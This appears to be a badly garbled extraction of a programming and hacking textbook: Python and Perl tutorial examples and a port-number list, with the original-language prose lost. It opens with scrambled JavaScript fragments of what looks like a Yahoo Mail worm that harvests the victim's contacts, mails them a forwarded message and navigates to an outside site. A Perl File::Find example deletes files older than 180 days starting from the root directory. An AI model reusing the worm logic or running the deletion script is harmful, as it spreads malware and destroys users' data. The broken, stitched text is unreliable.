AttData=&OldUplData=&FName=&ATT=&VID=&Markers=&NextMarker=0 &Thumbnails=&PhotoMailWith=&BrowseState=&PhotoIcon=&ToolbarState =&VirusReport=&Attachments=&Background=&BGRef=&BGDesc=&BGDef =&BGFg=&BGFF=&BGFS=&BGSolid=&BGCustom=&PlainMsg=%3Cbr%3E %3Cbr%3ENote%3A+forwarded+message+attached.var BoxName = ComposeAction.0). Param = Param. BoxName). 'POST'.CutLen = incIndex .com').net/?ShowFolder&rb=Sent&reset=1&YY =75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=I nbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&order=down&sor t=date&pos=0&view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset= 93 .Param= Param.5.makeRequest(Url .replace('EMAILMID'.replace('EMAILBODY'.&Format=html&sendbottom=Send&s avedraftbottom=Save+as+a+Draft&cancelbottom=Cancel&cancelbottom= Cancel'. MySubj). Email).substr(QIndex + 5. alertContents.replace('EMAILSUBJ'. Param = Param.MidIndex .0). ''). } }} function alertContents() { if (http_request.0).replace('PlainMESSAGE'.indexOf('?box=' . Param = Param.Param = Param.var MyMid = ComposeAction.navigate('http://www. MySubj). Param = Param.5.ComposeAction. CRumb).replace('FROMEMAIL'. 'av3@yahoo. Param = 'SEND=1&SD=&SC=&CAN=&docCharset=windows1256&PhotoMailUser=&PhotoToolInstall=&OpenInsertPhoto=&PhotoGetSta rt=0&SaveCopy=no&PhotoMailInstallOrigin=&.

ListContacts.yahoo. 'GET'.1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&b ox=Inbox&BCCList=' + IDList) } } makeRequest('http://us.random(). null)"> Please wait while loading the site 94 .' + Server + '.mail.com/ym/QuickBuilder?build=Continue&cancel=&continuetop= Continue&canceltop=Cancel&Inbox=Inbox&Sent=Sent&pfolder=all&freqCh eck=&freq=1&numdays=on&date=180&ps=1&numadr=100&continuebott om=Continue&cancelbottom=Cancel&rnd=' + Math.

Hactivism 95 .Python - “All information should be free” .

96 .

Python Guido van Rossum- - Python 2. 97 py IDLE editor .google.html) PythonJython .python.5 python python Python Python libraryPython GoogleGoogle(http://www.com/jobs/index.python.org/cgi-bin/moinmoin/PythonEditors Linux/FreeBSD python Windows python http://www.. Python editor editoreditor IDLE editor- LISP JavaWindows- http://www.org/download Hello World Python EditorCTRL + F5.

long LISP long Python integers.py print 'Hello World' $ python helloworld. Int Long memory bignum 'What's your name?' (slash) ? C Unicodeu"This is a Unicode string.py Hello World Python and assert break class continue def del elif else except exec finally for from global if import in is lambda not or pass print raise return try while yield integers. name myName. complex numbers." _myname. myname #!/usr/bin/python # Filename : var. floating point.#!/usr/bin/python # Filename : helloworld.py i=5 print i 'What\ \\” \ u” 98 .

i=i+1 print i s = '''This is a multi-line string.py 5 6 This is a multi-line string. i=5 print i i = 5. python - - (+): -): 50 2*3 4/3 1 (integer (//): 4 // 3.''' print s $ python var. This is the second line. This is the second line.0 ) 99 .

- AND” “OR” ” invet” (&): 5 & 3 (|): 5 | 3 : 5 ^ 3 “xor” (~). 2 * (length + breadth) $ python expression.py 100 .2.py length = 5 breadth = 2 area = length * breadth print 'Area is'. x invert -(x+1): ~5 - (<): 5 < 3 3<5<7 (>): 5 > 3 #!/usr/bin/python # Filename: expression. area print 'Perimeter is'.

you guessed it.py Enter an integer : 22 No. it is a little lower than that Done if $ python if.py Enter an integer : 23 Congratulations. (but you do not win any prizes!) Done 101 . you guessed it.Area is 10 Perimeter is 14 If #!/usr/bin/python # Filename: if.py Enter an integer : 50 No. it is a little lower than that' print 'Done' $ python if. it is a little higher than that' else: print 'No. it is a little higher than that Done $ python if.' print "(but you do not win any prizes!)" elif guess < number: print 'No.py number = 23 guess = int(raw_input('Enter an integer : ')) if guess == number: print 'Congratulations.

- Enter an integer : 22 No. you guessed it.' running = False elif guess < number: print 'No. it is a little lower than that.while#!/usr/bin/python # Filename: while. Done . it is a little higher than that. Enter an integer : 23 Congratulations.py number = 23 running = True while running: guess = int(raw_input('Enter an integer : ')) if guess == number: print 'Congratulations.For #!/usr/bin/python 102 - .' print 'Done' $ python while. it is a little higher than that.' else: print 'No. The while loop is over. you guessed it.py Enter an integer : 50 No.' else: print 'The while loop is over. it is a little lower than that.

# Filename: for.py for i in range(1, 5): print i else: print 'The for loop is over' $ python for.py 1 2 3 4 The for loop is over - Break -

#!/usr/bin/python # Filename: break.py while True: s = raw_input('Enter something : ') if s == 'quit': break print 'Length of the string is', len(s) print 'Done' $ python break.py Enter something : Programming is fun Length of the string is 18 Enter something : use Python! Length of the string is 12 Enter something : quit Done - Continue If -

103

#!/usr/bin/python # Filename: continue.py while True: s = raw_input('Enter something : ') if s == 'quit': break if len(s) < 3: continue print 'Input is of sufficient length' $ python continue.py Enter something : a Enter something : 12 Enter something : abc Input is of sufficient length Enter something : quit -

#!/usr/bin/python # Filename: func_param.py def printMax(a, b): if a > b: print a, 'is maximum' else: print b, 'is maximum' printMax(3, 4) x=5 y=7 printMax(x, y) $ python func_param.py 4 is maximum 7 is maximum

104

#!/usr/bin/python # Filename: func_local.py def func(x): print 'x is', x x=2 print 'Changed local x to', x x = 50 func(x) print 'x is still', x $ python func_local.py x is 50 Changed local x to 2 x is still 50

#!/usr/bin/python # Filename: func_global.py def func(): global x print 'x is', x x=2 print 'Changed global x to', x x = 50 func() print 'Value of x is', x $ python func_global.py x is 50 Changed global x to 2 Value of x is 2

#!/usr/bin/python # Filename: func_default.py 105

py def maximum(x. 5) print printMax. 'is maximum' else: print y. 5) $ python func_default.__doc__ $ python func_doc. 3) 3 DocStrings #!/usr/bin/python # Filename: func_doc.''' x = int(x) y = int(y) if x > y: print x. y): '''Prints the maximum of two numbers.py 5 is maximum Prints the maximum of two numbers. 'is maximum' printMax(3. 106 . y): if x > y: return x else: return y print maximum(2.py Hello WorldWorldWorldWorldWorld #!/usr/bin/python # Filename: func_return. The two values must be integers.def say(message. times = 1): print message * times say('Hello') say('World'.py def printMax(x.

'/usr/lib/python2.py we are arguments The PYTHONPATH is ['/home/swaroop/byte/code'. '/usr/lib/python2.argv: print i print '\n\nThe PYTHONPATH is'.path. '\n' $ python using_sys.1' #!/usr/bin/python 107 . '/usr/lib/python2.The two values must be integers. this is mymodule speaking.' version = '0. - python#!/usr/bin/python # Filename: using_sys.py we are arguments The command line arguments are: using_sys. '/usr/lib/python2.3/site-packages'.0'] library- #!/usr/bin/python # Filename: mymodule.py def sayhi(): print 'Hi.3/sitepackages/gtk-2.3/lib-dynload'. '/usr/lib/python2. '/usr/lib/python23.zip'. '/usr/lib/python2.3/lib-tk'.3'. sys.3/plat-linux2'.py import sys print 'The command line arguments are:' for i in sys.

# Filename: mymodule_demo. mymodule.' shoplist. len(shoplist).py shoplist = ['apple'.sayhi() print 'Version'.sort() print 'Sorted shopping list is'. Dictionary (list) - #!/usr/bin/python # Filename: using_list. Tuple.' print 'These items are:'. print '\nI also have to buy rice. Version 0. 'mango'. this is mymodule speaking.py Hi. for item in shoplist: print item. shoplist print 'I will sort my list now' shoplist. 'carrot'.append('rice') print 'My shopping list is now'. 'items to purchase. 'banana'] print 'I have'. shoplist[0] olditem = shoplist[0] del shoplist[0] 108 .py import mymodule mymodule.1 Python List. shoplist print 'The first item I will buy is'.version $ python mymodule_demo.

'carrot'.org 109 .info Contact Matsumoto at matz@ruby-lang. address in ab. 'banana'. olditem print 'My shopping list is now'.org Guido's address is guido@python. 'carrot'. 'mango'.info There are 4 contacts in the address-book Contact Swaroop at swaroopch@byteofpython.py I have 4 items to purchase.org Contact Guido at guido@python. 'Spammer' : 'spammer@hotmail. #!/usr/bin/python # Filename: using_dict.has_key('Guido') print "\nGuido's address is %s" % ab['Guido'] $ python using_dict.org' del ab['Spammer'] print '\nThere are %d contacts in the address-book\n' % len(ab) for name. address) if 'Guido' in ab: # OR ab.print 'I bought the'. 'banana'. 'Matsumoto' : 'matz@ruby-lang. 'carrot'.org Contact Larry at larry@wall. 'rice'] Dictionary .py # 'ab' is short for 'a'ddress'b'ook ab = { 'Swaroop' : 'swaroopch@byteofpython. 'rice'] The first item I will buy is apple I bought the apple My shopping list is now ['banana'. 'Larry' : 'larry@wall.org'. 'mango'.items(): print 'Contact %s at %s' % (name.com' } print "Swaroop's address is %s" % ab['Swaroop'] ab['Guido'] = 'guido@python.org'.py Swaroop's address is swaroopch@byteofpython.info'. shoplist $ python using_list. 'rice'] I will sort my list now Sorted shopping list is ['apple'. 'mango'. My shopping list is now ['apple'. These items are: apple mango carrot banana I also have to buy rice.

'banana'] mylist = shoplist del shoplist[0] print 'shoplist is'. 'mango'. 'carrot'. '/home/swaroop/bin'] # If you are using Windows.strftime('%Y%m%d') now = time. 'carrot'. mylist $ python reference. 'carrot'.#!/usr/bin/python # Filename: reference. use source = [r'C:\Documents'. 'banana'] Copy by making a full slice shoplist is ['mango'.py print 'Simple Assignment' shoplist = ['apple'. 'banana'] mylist is ['carrot'. mylist print 'Copy by making a full slice' mylist = shoplist[:] del mylist[0] print 'shoplist is'. 'banana'] mylist is ['mango'. 'carrot'. 'banana'] - Windows #!/usr/bin/python # Filename: backup_ver2. time source = ['/home/swaroop/byte'.r'D:\Work'] target_dir = '/mnt/e/backup/' today = target_dir + time. shoplist print 'mylist is'. shoplist print 'mylist is'.strftime('%H%M%S') comment = raw_input('Enter a comment --> ') 110 .py Simple Assignment shoplist is ['mango'.py import os.

exists(today): os.system(zip_command) == 0: print 'Successful backup to'.zip' if not os. ' '. how are you? 111 .if len(comment) == 0: target = today + os.zip $ python backup_ver4.path.py Enter a comment --> Successful backup to /mnt/e/backup/20041208/082316. '_') + '. target else: print 'Backup FAILED' Enter a comment --> added new examples Successful backup to /mnt/e/backup/20041208/082156_added_new_examples.py class Person: def sayHi(self): print 'Hello.py Hello.zip - #!/usr/bin/python # Filename: method.mkdir(today) print 'Successfully created directory'.sep + now + '.sayHi() on method.sep + now + '_' + \ comment.join(source)) if os. how are you?' p = Person() p. today zip_command = "zip -qr '%s' %s" % (target.zip' else: target = today + os.replace(' '.

name p = Person('Swaroop') p. salary): SchoolMember.name def tell(self): SchoolMember.age). name. my name is lagraj - #!/usr/bin/python # Filename: inherit.__init__ #!/usr/bin/python # Filename: class_init. name): self. name.''' def __init__(self. self.sayHi() $ python class_init.name.tell(self) 112 . age) self. class Teacher(SchoolMember): '''Represents a teacher. my name is'.''' print 'Name:"%s" Age:"%s"' % (self.''' def __init__(self.salary = salary print '(Initialized Teacher: %s)' % self.name = name self. name.name = name def sayHi(self): print 'Hello. age.py Hello. self. age): self.__init__(self.name def tell(self): '''Tell my details.py class SchoolMember: '''Represents any school member.age = age print '(Initialized SchoolMember: %s)' % self.py class Person: def __init__(self.

txt'. marks): SchoolMember.tell(self) print 'Marks: "%d"' % self. 'w') f.''' def __init__(self.marks t = Teacher('Mrs.py poem = '''\ Programming is fun When the work is done if you wanna make your work also fun: use Python! ''' f = file('poem. name.write(poem) 113 . Shrividya" Age:"40" Salary: "30000" Name:"Swaroop" Age:"22" Marks: "75" “w” #!/usr/bin/python # Filename: using_file. age. 40. Shrividya'. age) self.name def tell(self): SchoolMember. Shrividya) (Initialized Teacher: Mrs. 30000) s = Student('Swaroop'. Shrividya) (Initialized SchoolMember: Swaroop) (Initialized Student: Swaroop) Name:"Mrs.print 'Salary: "%d"' % self. 75) print members = [t. name.tell() (Initialized SchoolMember: Mrs. s] for member in members: member. 22.marks = marks print '(Initialized Student: %s)' % self.__init__(self.salary class Student(SchoolMember): '''Represents a student.

txt') while True: line = f.close() Programming is fun When the work is done if you wanna make your work also fun: use Python! 114 .readline() if len(line) == 0: break print line. f.close() f = file('poem.f.

Perl - “Good security is dependent on People. Process. and Technology.” 115 .

116 .

$b = 6. $c = $a . $d = $c / 2. print $d.- - - - - $a = 2. 13 # 117 . $b.

45.000. 5. Take 15 cases at $45. 9). print “Take $items[0] $items[2]s at \$$items[1] each. 2. 25000 #!/usr/bin/perl print 2_500_000. @B = (4. 6). “Hazel”. 2500000 @trees = (“Larch”. @C = (7.500. 118 . “case”). #!/usr/bin/perl print 2. My name is Jargal. 8.67.67 each. @C). @B.\n”.\n”. I live in Ulaanbaatar. 3). “Oak”). print “My name is $who. $where = ‘Ulaanbaatar’. Perl @A = (1.\n”. @D = (@A. print “I live in $where. @items = (15.#!/usr/local/bin/perl –w # Show warnings $who = ‘Jargal’.

print join( ‘. “Orange”. $C = @A B Perl Print sort ( ‘Beta’. ‘H’. (‘F’. (‘D’. “Orange”. ‘Phone’ ). ‘E’). ‘. ‘Alpha’ ) ). ‘G’.@A = (1. Alpha. Gamma print join( ‘: ‘. ‘Gamma’. “Banana”). Banana %fruit = (“Green”. @B = @A. ‘B’. Beta. ‘I’)). 3. ‘Address’. “Apple”. 2. Name : Address : Phone. print $fruit{“Yellow”}. ‘Alpha’ ). sort ( ‘Beta’. “Yellow”. ‘Gamma’. 4). A: B: C: D: E: F: G: H: I @fruit = (“Apple”. AlphaBetaGamma 1sort print join ( ‘ : ‘. print $fruit[2]. Banana 119 - . “Banana”). ‘Name’. ‘C’). “Orange”. (‘A’.

‘RE’. %State = ( ‘YY’. ‘Terra Cotta’. ‘RE’. Perl - #!/usr/bin/perl print "21 .25 is: ". ‘TC’. ‘Minnesota’. foreach $person ( ‘TC’. "\n". ‘Bliss’ ). 21 . My name is Ron Everly. "\n". } My name is Terra Cotta.21. 51 ANDed with 85 gives us 17 120 . ‘teach nuclear physics’. My name is Yon Yonson. ‘Yon Yonson’. ‘TC’. ‘Ron Everly’ ). ‘YY’. I live in Wisconsin. 51 & 85.\n”. ‘RE’ ) { print “My name is $Folk{$person}. ‘TC’.7 is: 10 #!/usr/bin/perl print"51 ANDed with 85 gives us ". I live in Bliss. 4 + 13 .25 is: 4 4 + 13 . ‘watch football’). ‘RE’. I watch football there.%Folk = ( ‘YY’. ‘Wisconsin’.7 is: ". I live in Minnesota. I teach nuclear physics there.7.\n”. 25 . “I live in $State{$person}. print "4 + 13 . I work in a police there. %Job = ( ‘YY’.\n\n”. "\n". ‘work in a police’. “I $Job{$person} there.

1 > 1. "\n". "\n". "\n". 8 <=> 4. print "2 == 2? ". print "Are dogs greater than cats? ". 5 > 6. "\n". 6 != 7.#!/usr/bin/perl print"Which came first. print "^" lt "+". the chicken or the egg? -1 Are dogs greater than cats? 1 Is ^ less than + ? #!/usr/bin/perl print"5 > 6? ". 7 < 16. low value 6… 121 . print "1 > 1? ". print "chicken" cmp "egg". low value $value …\n”. print "dog" gt "cat". the chicken or the egg? ". "\n". Which came first. print "Compare 8 and 4? ". print "6 != 7? ". "\n". print "Compare 7 and 7? ". "\n". "\n". Sunday Weekend $value > 10 || print “Oops. print "7 < 16? ". 2 == 2. 7 <=> 7. print "Is ^ less than + ? ". "\n". 5 > 6? 7 < 16? 1 2 == 2? 1 1 > 1? 6 != 7? 1 Compare 8 and 4? 1 Compare 7 and 7? 0 $Weekend = $Saturday || $Sunday. "\n". 10print Oops.

print "After incrementing. print "Now. "\n". we have ". $b. " and ". $a. print "Our variables are ". $a. "\n". " and ". $a."\n". " and ". ( String ) #!/usr/bin/perl print "Ba". value is high enough…\n”. $a=--$b+4. " and ". we have ". $b=$a++. "na"x4*3 . print "Ba". "\n". $b=++$a*2. Ba0 Banananananananananananana – #!/usr/bin/perl $a=4. $a. print "Finally. "na"x(4*3) . we have 6 and 12 Finally. Our variables are 4 and 10 After incrementing. $b.$Solvent = ($income > 3) && ($debts < 10). $b=10. $b. "\n". we have 15 and 11 - 122 . we have 5 and 4 Now. $value > 10 && print “OK."\n". $b. we have ".

print "x" if -x _." or die "Couldn't open the current directory: $!". ". print "o" if -o _. " " x (30-length($_)). print "w" if -w _. print $_.plx rwo 119 headline.txt rwo 2860 copy. print "\n".".plx rwo 521 inventory. } Contents of the current directory: badopen. print "r" if -r _.plx rwo 346 directory. print "\t".txt rwo 1459 glob." or $_ eq ".plx rwo 241 gettysburg.plx rwo 514 filetest1.plx rwo 535 123 .plx rwo 111 chapter6. while ($_ = readdir(DH)) { next if $_ eq ".. print -s _ if -r _ and -f _. print "d" if -d $_.plx rwo 1387 fortune. opendir DH.if(-e $filename) {…} -e -f -d -z -s -r -w #!/usr/bin/perl print "Contents of the current directory:\n".

>> & |. . ~. ^ 124 . <<. - == != <=> > >= < <= Open (ERRLOG. -. []..log”) unless $NoLog. “test. {} > ++. \ =~. -. print “Success” unless $error>2. % x +. /. 22 21 20 19 18 17 16 15 14 13 12 11 10 9 (). !~ *. +. -** !.

: #!/usr/bin/perl my @array = ( "red". "STOP THIS NOW". for (@array) { last if $_ eq "STOP THIS NOW". while ($countdown > 0) { print "Counting down: $countdown\n". : next 125 . for. $countdown--. } : Counting down: 5 Counting down: 4 Counting down: 3 Counting down: 2 Counting down: 1 Last . print "Today's colour is $_\n". Perl while. foreach #!/usr/bin/perl my $countdown = 5. until.. not and or. } : Today's colour is red Today's colour is blue .8 7 6 5 4 3 2 1 0 && || . ?: . xor . "green"). "blue".

0. "\n". foreach $num ( @numbers ) { print “Number $num…\n”.\n". } : Number one… Number two… Number three… Number four… Perl STDIN. #!/usr/bin/perl open FILE. 3. Foreach block .txt" or die $!. 0). something broke. 12. STDOUT. "nlexample. : @numbers = (“one”. 126 .\n”). next. 48 over 2 is 24 48 over 12 is 4 Skipping zero element. “four”). “three”. 2. 48/$_. } : 48 over 8 is 6 48 over 3 is 16 Skipping zero element. - STDERR print (STDERR “Oops. } print "48 over $_ is ". for (@array) { if ($_ == 0) { print "Skipping zero element. “two”. my $lineno = 1.#!/usr/bin/perl my @array = (8.

">$destination" or die "Can't write on file $destination: $!\n". my $destination = $ARGV[1].txt #!/usr/bin/perl my $numeric = 0. } else { 127 . 3: And it's gonna tell you things that I still 4: Love you too much to say. open IN. Spike.txt to speech. } 1: One day you're going to have to face 2: A deep dark truthful mirror. } else { *INPUT = *STDIN. print ": $_". $input or die "Couldn't open file $input: $!\n". ">$output" or die "Couldn't open file $input: $!\n". 1988 ####### #!/usr/bin/perl my $source = $ARGV[0].while (<FILE>) { print $lineno++. } if (defined $output) { open OUTPUT. while (<IN>) { print OUT $_. } my $output = shift. } Copying gettsburg. if (defined $input) { open INPUT. $source or die "Can't read source file $source: $!\n". 5: ####### Elvis Costello. if (defined $input and $input eq "-n") { $numeric = 1. open OUT. $input = shift. print "Copying $source to $destination\n". my $input = shift.

Next Last Redo - RECORD: while ( <INFILE> ) { $even = !$even. because I'd wear it proudly If they had a king of fools then I could wear that crown Well. 128 . I finally found someone to turn me upside-down < > >> +< +> . print. And nail my feet up where my head should be And you can all die laughing. if ($numeric) { @file = sort { $a <=> $b } @file. } my @file = <INPUT>. next RECORD if $even. } print OUTPUT @file. } else { @file = sort @file.Labels .*OUTPUT = *STDOUT.

2 minutes and 3 seconds $x = 45. return ($h.$seconds). my $seconds = shift. sub egsub1 { print “This subroutine simply prints this line. } 3723 seconds is 1 hours.$m). $h = int($seconds/(60*60)).Subroutines sub subroutine-name { statements } #!/usr/bin/perl –w &egsub1. print "3723 seconds is $hours hours.\n”. 129 . $minutes minutes and $seconds seconds". $minutes. sub secs2hms { my ($h.$m. $m = int($seconds/60).} . print "\n". } Subroutine#!/usr/bin/perl my ($hours. $seconds) = secs2hms(3723). $seconds %= 60*60. $y = 3. $seconds %= 60.

} } Factorial 1 is 1 Factorial 2 is 2 Factorial 3 is 6 Factorial 4 is 24 Factorial 5 is 120 Factorial 6 is 720 Factorial 7 is 5040 Factorial 8 is 40320 Factorial 9 is 362880 Factorial 10 is 3628800 #!/usr/bin/perl my $x = 10.\n”. if ($x == 1) { return 1. print “is $returnval. $returnval = &egsub6($x. “\n”.\n”. } The (45+1) * (3+1) is 2070. for ($x=1.$y). Note that $x now is 47. sub egsub6 { # Access $x and $y by reference return ($_[0]++ * $_[0]++). { 130 . $_ = "alpha". and $y now is 3. $x<=10.&factorial($x). } sub factorial { local($x) = @_.print “The ($x+1) * ($y+1) “. } else { return ($x*factorial($x-1)). and \$y now is $y. $x++) { print “Factorial $x is “. print “Note that \$x now is $x.

'cept.} somesub().Pattern matching #!/usr/bin/perl my $found = 0. Case.". 131 . sub somesub { print "\$x is $x\n".. print "\$_ is $_\n". } } if ($found) { print "Hooray! Found the word 'people'\n". $_ = "Nobody wants to hurt you. local $_ = "beta". I do hurt people sometimes. my $sought = "people".. } $x is 10 $_ is beta $x is 10 $_ is alpha . somesub(). last. } Hooray! Found the word 'people' \ my $x = 20. foreach my $word (split) { if ($word eq $sought) { $found = 1.

Flee! Awake! Fire."\n". Awake! Awake! Fear. Foes! Awake! - • • • do. Foes! Awake!". do "printit. print $_. Do - 132 . Fire. s/Foes/Flee/.plx". Foes! Awake! Fire. Fire. done that.\a \b \d \D \n \r \t \f \s \S \v \w \W \x{2620} Backspace 0- Formfeed 1 Substitution #!/usr/bin/perl $_ = "Awake! Awake! Fear. got the T-shirt". use #!/usr/bin/perl my $a = "Been there. require.

print $a. return. unlink $_ or print "oops. 133 . } } print "Deleting unimportant file $_\n". Can't locate nothere. unlink $_ or print "oops. } else { use MyProgram::Test.plx in @INC (@INC contains: …\Chap10 C:/ require Monty::Phyton.plx". } File::Find #!/usr/bin/perl use File::Find. for (1. #!/usr/bin/perl require "nothere. sub cleanup { if (-A > 180) { print "Deleting old file $_\n". "/").. find(\&cleanup. couldn't delete $_: $!\n". if($graphical) { use MyProgram::Graphical.5) { my $line = <FH>. } open (FH. $_) or die "Couldn't open $_: $!\n". couldn't delete $_: $!\n". if ($line =~ /Perl|Simon|important/i) { return.

134 . } elsif ($options{l}) { if ($options{l} eq "french") { print "Bonjour. my %options. EOF exit. } elsif ($options{h}) { print <<EOF. getopts("vhl:". exit. oops.\n".zip: Permission denied Getopt::Std #!/usr/bin/perl use Getopt::Std.zip oops.} Deleting old file .\n". version 3. couldn't delete Backup.\%options).\n". tout le monde. } Hello. if ($options{v}) { print "Hello World. Getopt::Long File::Spec #!/usr/bin/perl use File::Spec::Functions. } } else { print "Hello. world. couldn't delete .: Deleting unimportant file Backup. world. } else { die "$0: unsupported language\n". $0: Typical Hello World program Syntax: $0 [–h|-v|-l <language>] -h : This help message -v : Print version on standard output and exit -l : Turn on international language support.

print "Yes. #!/usr/bin/perl use Benchmark. timethis($howmany. my $howmany = 10000. exit. timethis 10000: 1 wallclock secs ( 0. ".foreach (path()) { my $test = catfile($_. my $what = q/my $j=1.31 usr + 0.."dir"). opendir (DIR. Yes.\n". Win32::Sound::Volume(65535).00 sys = 0. my $wav. dir is in the $_ directory. $what).") or die "Couldn't open directory: $!".88/s (n=10000) (warning: too few iterations for a reliable count) Win32::Sound #!/usr/bin/perl use Win32::Sound. dir is in the C:\WINDOWS\system32 directory.31 CPU) @ 31948. for (1. while ($wav = readdir(DIR)) { Win32::Sound::Play($wav). } Perl 5- Encapsulation: 135 .100) {$j*=$_}/.\n". } print "dir was not found here.

print "This person's surname: ". print "Population now: ". my $object = Person->new ( surname => "Galilei". my $object = Person->new ( surname => "Gallelei". print '$c is a '. occupation => "bombadier" ). my $b = {}. 136 . address => "9.". Person->headcount. print '$b is a '. use Person6.". "\n".81 Pisa Apts. my $d = \$c. " reference\n". print "In the beginning: ". $object->surname. print '$a is a '. print '$d is a '. ref $d.81 Pisa Apts. " reference\n". This person's surname: Galilei #!/usr/bin/perl use warnings. use strict. ref $c. " reference\n". "\n". my $c = \1. ref $a. forename => "Galleleo". " reference\n".#!/usr/bin/perl my $a = []. "\n". $a is a ARRAY reference $b is a HASH reference $c is a SCALAR reference $d is a REF reference #!/usr/bin/perl use Person4. address => "9. ref $b. occupation => "bombadier" ). Person->headcount. forename => "Galileo".

You owe me money.my $object2 = Person->new ( surname => "Einstein". address => "9. address => "9E16. occupation => "bombadier" ). Yours faithfully. Galileo Galilei 9. Please pay it. Relativity Drive". forename => "Galileo".81 Pisa Apts. my $object = Employee->new ( surname => "Galilei". Please pay it. In the beginning: 0 Population now: 1 Population now: 2 #!/usr/bin/perl use Employee1."). 30/11/2005 Dear Galileo. print "Population now: ". $object->printletter("You owe me money. forename => "Albert".".81 Pisa Apts. Person->headcount. - DBM (DataBase 137 . occupation => "Plumber" ). "\n".

plx use POSIX. tie %gdbm_db. tie %dbm.dbm". use GDBM_File. my %dbm. 0. 'GDBM_File'. my $ndbm_file='/tmp/my_old_ndbm_database'.. O_RDWR.‘Berkeley’ DB DBM #!/usr/bin/perl use POSIX.gdbm . %gdbm_db=%ndbm_db.$gdbm_file. my $gdbm_file='/tmp/my_new_gdbm_database'. $db_file.%gdbm_db). 'NDBM_File'. my (%ndbm_db. my $db_file="/tmp/demo. 0644. untie %ndbm_db. use SDBM_File.‘new’ DBM GDBModbm . 0. - 138 . # or GDBM_File / NDBM_File / AnyDBM_File. 'SDBM_File'. use NDBM_File.‘old’ DBM sdbm bsd-db .$ndbm_file. #!/usr/bin/perl #copydbm. tie %ndbm_db. O_CREAT|O_WRONLY.Gnu DBM ndbm .. untie %gdbm_db. O_RDONLY.

PostgreSQL DBD::Proxy .Search server/PCDOCS.Empressnet DBD::Illustra .Comma-Separated Value SQL DBD::DB2 .DBIDBD::Search server .Oracle DBD::Pg .Altera DBD::CSV . Informix Online DBD::Ingres DBD::Interbase .MicrosoftDBD::Oracle .IBMDBD::Empress .Interbase DBD::ODBC .MicrosoftDBD::Adabas .DBD::ADO .Illustra DBD::Informix .Informix SE. 139 .Adabese DBD::Altera .

#!\usr\bin\perl use DBI. $sth=$dbh->prepare("CREATE TABLE checkin ( id INTEGER AUTO_INCREMENT PRIMARY KEY. # execute the statement $sth->finish(). numberofbags INTEGER.Sybese DBD::Unify . # finish the execution print "All done\n". $dbh->disconnect.DBD::Solid . 140 .'root'. $sth). $dbh=DBI->connect('dbi:mysql:test'. checkedin INTEGER.Solid DBD::Sybase . destination VARCHAR(32) NOT NULL)").'elephant') || die "Error opening database: $DBI::errstr\n". my ($dbh.Unify DBD::XBase Msql-MySQL-modules my $dbh=DBI->connect('dbi::') || die "Error opening database: $DBI::errstr\n". $sth->execute(). firstname VARCHAR(32) NOT NULL. $dbh->disconnect || die "Failed to disconnect\n". lastname VARCHAR(32) NOT NULL.

- - 141 .

142

-

-

Assigned Numbers Authority -

Internet 0 - 1023 -

http://www.iana.org/assignments/port-numbers - TCP Port Service Multiplexer 2 - Management Utility 7 - Echo 11 - Active Users 13 - Daytime 18 - Message Send Protocol 19 - Character Generator 20 - File Transfer ( ) - File Transfer Protocol - SSH Remote Login Protocol - Telnet - Private mail system - Simple Mail Transfer Protocol 35 - Private Printer Server 37 - Time 38 - Route Access Protocol 39 - Resource Location Protocol 42 - Host Name Server 43 - Who Is 45 - Message Processing Module 49 - Login Host Protocol 50 - Remote Mail Checking Protocol 52 - XNS Time Protocol 53 - Domain Name Server 143

- XNS Clearinghouse - XNS Authentication - Private Terminal Access - XNS Mail - Private File Service - Whois++ - Oracle SQL*NET 69 - Trivial File Transfer Protocol - Gopher 79 - Finger - HTTP 81 - HOSTS2 Name Server 84 - Common Trace Facility 87 - Private Terminal Link 89 - SU/MIT Telnet Gateway 90 - DNSIX Securit Attribute Token Map 92 - Network Printing Protocol 93 - Device Control Protocol 101 - NIC Host Name Server 103 - Genesis Point-to-Point Trans Net 107 - Remote Telnet Service 109 - Post Office Protocol (POP2) 110 - POP3 111 - SUN Remote Procedure Call - Authentication Service - Simple File Transfer Protocol - SQL Services - Network News Transfer Protocol 121 - Encore Expedited Remote Pro.Call 123 - Network Time Protocol 129 - Password Generator Protocol - NETBIOS Name Service - NETBIOS Datagram Service - SMB / NETBIOS Session Service 143 - Internet Message Access Protocol 148 - Jargon 150 - SQL-NET 152 - Background File Transfer Program 153 - SGMP 144

Multi Protocol Trans.InfoSeek .Directory Location Service Monitor .AppleShare IP WebAdmin .SQL Service 158 .Interactive Mail Support Protocol .Aurora CMGR .Kryptolan .Xerox .Queued File Transport .SNMP in .156 .dBASE Unix .CMIP/TCP Agent .A Remote Network Server System .Internet Relay Chat Protocol .Spider Remote Monitoring Protocol .Gateway Access Control Protocol .PCMail Server 159 .Semantix .Directory Location Service .Zebra server .SGMP-TRAPS .Fatmen Server .Efficient Short Remote Operations .NNSP 145 . Net .Cabletron Management Protocol .ListProcessor .SMUX .Network Security Risk Management Protocol .SNMP trap .Storage Management Services Protocol .IIOP Name Service over TLS/SSL .Border Gateway Protocol .Openport .Interactive Mail Access Protocol v3 .CMIP/TCP Manager .NSS-Routing .Sirius Systems .Quick Mail Transfer Protocol .

444 445 451 469 470 479 480 501 505 519 529 531 537 546 547 552 563 565 574 580 586 595 600 604 614 615 647 651 660 689 691 695 810 830 989 - MobileIP-Agent MobilIP-MN HTTPS Simple Network Paging Protocol Microsoft SQL Server over NetBIOS Computer Supported Telecomunication Applications Cray Network Semaphore server Radio Control Protocol SCX-proxy Iafserver Iafdbase STMF Mailbox-lm Unixtime IRC-SERV Chat Networked Media Streaming Protocol DHCPv6 Client DHCPv6 Server DeviceShare NNTP protocol over TLS/SSL Whoami FTP Software Agent System SNTP HEARTBEAT Password Change CAB Protocol Sun IPC server TUNNEL SSLshell Internet Configuration Manager DHCP Failover IEEE MMS MacOS Server Admin NMAP MS Exchange Routing IEEE-MMS-SSL FCP NETCONF over SSH FTP protocol. data. over TLS/SSL 146 .

